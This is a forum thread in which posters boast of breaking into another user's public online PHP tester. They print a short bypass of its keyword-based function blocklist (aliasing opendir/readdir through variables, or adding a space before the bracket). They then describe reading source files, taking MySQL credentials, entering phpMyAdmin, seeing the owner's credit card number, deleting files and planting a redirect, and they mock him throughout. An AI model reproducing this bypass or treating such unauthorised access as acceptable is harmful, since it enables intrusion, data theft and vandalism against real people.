Hi, everyone. I recommand you to check this website out: http://forumferney.free.fr/stester.html. It's a dynamic website on which you can directly execute PHP scripts to test them (without uploading) and for free. You can even use the script on your own website! (by looking at the sourcecode you can call the php script from your website directly).
I just deleted stester.html Good job on security. EDIT: After highlighting the code of your execute script, I figured it was even easier to bypass the security hole than I thought. Oh jeeze... EDIT 2: I just found your MySQL access details for mysql5.worldispnetwork.com. This is exciting. Thanks for putting this up. EDIT 3: also found your MySQL details for the host you're using for this. You're too smart. EDIT 4: Wow, I just entered your PhpMyAdmin, and found your credit card number, lmao. It expires on 05/08. Dude, seriously. Take this shit off. EDIT 5: I deleted stexecute.php as well now. Just for your good. You should be thankful...
It's funny what ideas people have. What on earth would this be good for? I guess every serious coder has a local web server with PHP and tests the code there.
awesome.. well may be you can tell a thing or two about what he did wrong as I too may be doing something that stupid
I think by using : highlight_file(__FILE__); PHP: , you can see the code source of a web page . Then you can see the database file connection . then access phpmyadmin ?
EDIT: Well, he has a separate server for MySQL, with another subdomain. I just went there and it asked me for the login details. Which were in the highlighted file as well. He had about 500 "or"s in his code which looked like this more or less: if (strpos($code, 'fopen(') !== false || strpos($code, 'opendir(') !== false || strpos($code, 'readdir(') !== false [.......]) PHP: I expected the code to be a little bit more secure and did this to bypass the function block: $echo = 'opendir'; $echo2 = 'readdir'; $fp = $echo('.'); while (($file = $echo2($fp)) !== false) { echo "$file<br />\n"; } PHP: From there could I see the files. glob() didn't work for some reason. Or now that I think of, maybe print_r() doesn't work with eval()... anyway. Now that I could read the dirs, I did just a highlight_file() on the files that seemed to be interesting and saw its contents. I could have bypassed this even easier by putting a space between the function name and bracket. $dir = opendir ('.'); PHP: But I figured that out later after highlighting the execute file.
Lol, I'm sorry. You still can with a local form. Point it to stexecute.php with a field name called "code".
Lol, he's stupid enough for putting it up again after it "magically" disappeared. I hope he learns now. And if not, I'll continue messing it up until he gets it, lol.
You know , i dont even need a local form to mess with it loool just use google cache and it will work ... xxx Cxxx doxx mexx scriptxxxx.html uxxxx.php maxxx.html jsxxxx
he disabled the highlight_file(); lol Error: Some commands in this script are not allowed in ScriptTester. Click here for a list of unallowed commands.
See my post above to see how to bypass this. http://forums.digitalpoint.com/showpost.php?p=2963065&postcount=8
i think he's a french guy , a lot of flash and files are in french . i think we should leave him a french message also lol
Left him a french messsage looool , and a redirection to this thread after 10 seconds so we will be sure he read it
Hahahahah....co'mon people....he was just making some new friends (visitors). Stop being so mean....so what he might lose his cc for fraud ....?!!? )) hahah..this shit was strong...